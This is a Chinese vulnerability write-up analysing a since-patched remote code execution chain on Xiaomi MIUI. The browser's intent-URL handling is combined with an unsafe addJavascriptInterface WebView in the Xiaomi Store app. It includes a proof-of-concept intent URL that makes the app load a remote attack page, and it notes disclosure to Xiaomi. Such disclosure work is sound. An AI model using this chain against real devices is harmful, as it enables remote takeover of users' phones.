小米手机MIUI远程代码执行漏洞分析

安全 漏洞 终端安全
7月笔者在研究webview漏洞时专门挑小米手机的MIUI测试了下,发现了非常明显的安全漏洞。通过该漏洞可以远程获取本地APP的权限,突破本地漏洞和远程漏洞的界限,使本地app的漏洞远程也能被利用,达到隔山打牛的效果。

7月我在研究webview漏洞时专门挑小米手机的MIUI测试了下,发现了非常明显的安全漏洞。通过该漏洞可以远程获取本地APP的权限,突破本地漏洞和远程漏洞的界限,使本地app的漏洞远程也能被利用,达到隔山打牛的效果。在漏洞发现的第一时间,我已经将漏洞细节报告给了小米安全响应中心,目前漏洞已经修复。

[[118885]]

测试环境:

手机型号:MI 3

Android版本:4.2.1 JOP40D

MIUI版本:MIUI-JXCCNBE21

内核版本:3.4.35-ga656ab9

一. 小米MIUI原生浏览器存在意图协议安全问题

在使用小米原生浏览器的时候我发现MIUI定制了网络异常页面, 如当前url不能访问或网络异常会跳转到定制的网页,通过点击网页中的链接可以直接进入WIFI的设置界面。

小米手机MIUI远程代码执行漏洞分析

根据我以往的经验,APP要在静态网页中实现进程间通信主流的方法有两种,一种是通过addJavascriptInterface给webview加入一个javascript桥接接口,通过调用这个接口可以直接操作本地的JAVA接口。另外一种方法是使用Intent.parseUri解析URL,让APP支持intent scheme URLs(意图协议URL),通过解析特定格式的URL直接向系统发送意图。

测试过后,果然发现小米浏览器完全支持意图协议URL,测试过程如下,让小米浏览器直接访问下面的地址,浏览器会向系统发起意图,启动本地的日历APP

intent:#Intent;component=com.android.calendar/com.android.calendar.LaunchActivity;end

小米手机MIUI远程代码执行漏洞分析

我再翻阅了一下google官方framework中intent的源代码:

/platform/frameworks/base/+/core/java/android/content/Intent.java

3966行的Intent.parseUri定义

  1. if (uri.startsWith("S.", i)) b.putString(key, value);  
  2. else if (uri.startsWith("B.", i)) b.putBoolean(key, Boolean.parseBoolean(value));  
  3. else if (uri.startsWith("b.", i)) b.putByte(key, Byte.parseByte(value));  
  4. else if (uri.startsWith("c.", i)) b.putChar(key, value.charAt(0));  
  5. else if (uri.startsWith("d.", i)) b.putDouble(key, Double.parseDouble(value));  
  6. else if (uri.startsWith("f.", i)) b.putFloat(key, Float.parseFloat(value));  
  7. else if (uri.startsWith("i.", i)) b.putInt(key, Integer.parseInt(value));  
  8. else if (uri.startsWith("l.", i)) b.putLong(key, Long.parseLong(value));  
  9. else if (uri.startsWith("s.", i)) b.putShort(key, Short.parseShort(value));  
  10. else throw new URISyntaxException(uri, "unknown EXTRA type", i); 

可以明显的看到Intent.parseUri解析URL时完全可以自定义EXTRA DATA和DATA以及acion等,通过符合格式的协议地址向本地任意APP发送任意意图,所以如果本地某个APP的导出组件存在漏洞,我们也可以从这个入口进行远程攻击。

二.小米商店存在webview远程代码执行漏洞

顺着第一部分的思路,我开始审计MIUI系统中预装和内置的APP,希望能发现被远程利用的漏洞。在自动漏洞扫描中,我发现小米官方的APP“小米商店”的webview使用了addjavascriptinterface,且编译API级别小于17,可能存在webview远程代码执行漏洞。

小米手机MIUI远程代码执行漏洞分析

于是我针对这个APP进行了逆向分析,发现了该APP的多个导出组件,如com.xiaomi.shop.activity.MainActivity组件接受参数能够被外部调用加载任意的网页。

小米手机MIUI远程代码执行漏洞分析

同时我发现了该组件关联的com.xiaomi.shop.ui类初始化了一个叫WE的addJavascriptInterface漏洞接口,并且没有做任何安全处理。

小米手机MIUI远程代码执行漏洞分析

根据逆向代码,com.xiaomi.shop.activity.MainActivity这个活动组件接受的EXTRA DATA是string类型,结合第一部分小米浏览器的意图协议漏洞,可以轻松写出漏洞验证代码,通过导入的网页调用存在漏洞的JavascriptInterface接口WE,能够以当前APP的权限执行任意的命令和JAVA代码

intent:#Intent;component=com.xiaomi.shop/com.xiaomi.shop.activity.MainActivity;
S.com.xiaomi.shop.extra_closed_url=http://server/acttack.html;
end

三. 安全建议.

安卓开发者在注意用户体验的开发同时也应该关注安全,因为某个APP的易用功能而导致整个系统的安全性大打折扣就得不偿失了。

本次分析的漏洞,如果是恶意攻击者,通过载入远程的恶意网页利用ROOT漏洞攻击,完全可以直接掌控受害者的手机,后果不可想象。据了解小米官方已经修复了小米商店APP存在的漏洞,建议小米手机和MIUI的用户都尽快升级。

参考:

[1]https://github.com/android/platform_frameworks_base/blob/master/core/java/android/content/Intent.java

[2] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4710

原文地址:http://blogs.360.cn/360mobile/2014/08/25/miui-rce-vul/

责任编辑:蓝雨泪 来源: 博客
相关推荐

2015-06-18 10:49:31

2020-10-08 13:44:27

漏洞

2017-08-22 13:45:27

2021-01-26 10:00:45

漏洞网络安全网络攻击

2017-05-25 22:20:05

2015-03-06 15:31:01

2016-09-29 14:37:39

ImageMagick漏洞分析

2011-08-16 17:05:35

2017-05-27 10:22:37

2011-08-04 13:53:04

2019-05-15 15:20:01

微软漏洞防护

2014-09-12 17:47:36

2015-04-30 08:11:40

2023-12-14 16:20:09

2014-10-29 15:44:55

2017-06-15 17:28:36

2017-08-15 17:39:52

2010-01-25 11:37:30

2010-01-26 11:12:09

2013-05-22 10:28:19

点赞
收藏

51CTO技术栈公众号